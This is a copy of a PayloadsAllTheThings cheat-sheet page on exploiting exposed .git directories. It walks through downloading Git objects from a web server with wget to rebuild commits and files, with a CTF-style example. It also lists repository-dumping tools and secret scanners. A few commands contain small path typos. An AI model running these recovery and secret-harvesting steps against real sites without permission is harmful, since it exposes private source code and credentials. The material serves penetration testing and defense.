git.md (8768B)
1 --- 2 title: "Git" 3 topic: "Insecure Source Code Management" 4 topicSlug: "insecure-source-code-management" 5 sourcePath: "Insecure Source Code Management/Git.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Insecure%20Source%20Code%20Management/Git.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Git 12 13 ## Summary 14 15 * [Methodology](#methodology) 16 * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) 17 * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) 18 * [Tools](#tools) 19 * [Automatic recovery](#automatic-recovery) 20 * [git-dumper.py](#git-dumperpy) 21 * [diggit.py](#diggitpy) 22 * [GoGitDumper](#gogitdumper) 23 * [rip-git](#rip-git) 24 * [GitHack](#githack) 25 * [GitTools](#gittools) 26 * [Harvesting secrets](#harvesting-secrets) 27 * [noseyparker](#noseyparker) 28 * [trufflehog](#trufflehog) 29 * [Yar](#yar) 30 * [Gitrob](#gitrob) 31 * [Gitleaks](#gitleaks) 32 * [References](#references) 33 34 ## Methodology 35 36 The following examples will create either a copy of the .git or a copy of the current commit. 37 38 Check for the following files, if they exist you can extract the .git folder. 39 40 * `.git/config` 41 * `.git/HEAD` 42 * `.git/logs/HEAD` 43 44 ### Recovering file contents from .git/logs/HEAD 45 46 * Check for 403 Forbidden or directory listing to find the `/.git/` directory 47 * Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) 48 49 ```powershell 50 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git 51 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000 commit: Initial. 52 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000 commit: Whoops! Remove flag. 53 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000 commit: Prevent directory listing. 54 ``` 55 56 * Access the commit using the hash 57 58 ```powershell 59 # create an empty .git repository 60 git init test 61 cd test/.git 62 63 # download the file 64 wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c 65 66 # first byte for subdirectory, remaining bytes for filename 67 mkdir .git/object/26 68 mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ 69 70 # display the file 71 git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c 72 tree 323240a3983045cdc0dec2e88c1358e7998f2e39 73 parent 15ca375e54f056a576905b41a417b413c57df6eb 74 author Michael <michael@easyctf.com> 1489390329 +0000 75 committer Michael <michael@easyctf.com> 1489390329 +0000 76 Initial. 77 ``` 78 79 * Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 80 81 ```powershell 82 wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 83 mkdir .git/object/32 84 mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ 85 86 git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 87 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css 88 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt 89 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts 90 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html 91 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js 92 ``` 93 94 * Read the data (flag.txt) 95 96 ```powershell 97 wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f 98 mkdir .git/object/cb 99 mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ 100 git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f 101 ``` 102 103 ### Recovering file contents from .git/index 104 105 Use the git index file parser <https://pypi.python.org/pypi/gin> (python3). 106 107 ```powershell 108 pip3 install gin 109 gin ~/git-repo/.git/index 110 ``` 111 112 Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. 113 114 ```powershell 115 $ gin .git/index | egrep -e "name|sha1" 116 name = AWS Amazon Bucket S3/README.md 117 sha1 = 862a3e58d138d6809405aa062249487bee074b98 118 119 name = CRLF injection/README.md 120 sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 121 ``` 122 123 ## Tools 124 125 ### Automatic recovery 126 127 #### git-dumper.py 128 129 * [arthaud/git-dumper](https://github.com/arthaud/git-dumper) 130 131 ```powershell 132 pip install -r requirements.txt 133 ./git-dumper.py http://web.site/.git ~/website 134 ``` 135 136 #### diggit.py 137 138 * [bl4de/security-tools/diggit](https://github.com/bl4de/security-tools/) 139 140 ```powershell 141 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] 142 ./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 143 ``` 144 145 `-u` is remote path, where .git folder exists 146 `-t` is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (`cd /path/to/temp/folder && git init`) 147 `-o` is a hash of particular Git object to download 148 149 #### GoGitDumper 150 151 * [c-sto/gogitdumper](https://github.com/c-sto/gogitdumper) 152 153 ```powershell 154 go get github.com/c-sto/gogitdumper 155 gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ 156 git log 157 git checkout 158 ``` 159 160 #### rip-git 161 162 * [kost/dvcs-ripper](https://github.com/kost/dvcs-ripper) 163 164 ```powershell 165 perl rip-git.pl -v -u "http://web.site/.git/" 166 167 git cat-file -p 07603070376d63d911f608120eb4b5489b507692 168 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 169 parent 15ca375e54f056a576905b41a417b413c57df6eb 170 author Michael <michael@easyctf.com> 1489389105 +0000 171 committer Michael <michael@easyctf.com> 1489389105 +0000 172 173 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 174 ``` 175 176 #### GitHack 177 178 * [lijiejie/GitHack](https://github.com/lijiejie/GitHack) 179 180 ```powershell 181 GitHack.py http://web.site/.git/ 182 ``` 183 184 #### GitTools 185 186 * [internetwache/GitTools](https://github.com/internetwache/GitTools) 187 188 ```powershell 189 ./gitdumper.sh http://target.tld/.git/ /tmp/destdir 190 git checkout -- . 191 ``` 192 193 ### Harvesting secrets 194 195 #### noseyparker 196 197 > [praetorian-inc/noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line tool that finds secrets and sensitive information in textual data and Git history. 198 199 ```ps1 200 git clone https://github.com/trufflesecurity/test_keys 201 docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest scan --datastore datastore.np ./test_keys/ 202 docker run -v "$PWD":/scan ghcr.io/praetorian-inc/noseyparker:latest report --color always 203 noseyparker scan --datastore np.noseyparker --git-url https://github.com/praetorian-inc/noseyparker 204 noseyparker scan --datastore np.noseyparker --github-user octocat 205 ``` 206 207 #### trufflehog 208 209 > Searches through git repositories for high entropy strings and secrets, digging deep into commit history. 210 211 ```powershell 212 pip install truffleHog 213 truffleHog --regex --entropy=False https://github.com/trufflesecurity/trufflehog.git 214 ``` 215 216 #### Yar 217 218 > Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog. 219 220 ```powershell 221 go get github.com/nielsing/yar # https://github.com/nielsing/yar 222 yar -o orgname --both 223 ``` 224 225 #### Gitrob 226 227 > Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. 228 229 ```powershell 230 go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob 231 export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef 232 gitrob [options] target [target2] ... [targetN] 233 ``` 234 235 #### Gitleaks 236 237 > Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. 238 239 * Run gitleaks against a public repository 240 241 ```powershell 242 docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git 243 ``` 244 245 * Run gitleaks against a local repository already cloned into /tmp/ 246 247 ```powershell 248 docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks 249 ``` 250 251 * Run gitleaks against a specific Github Pull request 252 253 ```powershell 254 docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 255 ``` 256 257 ## References 258 259 * [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://web.archive.org/web/20240930092732/https://michenriksen.com/blog/gitrob-now-in-go/)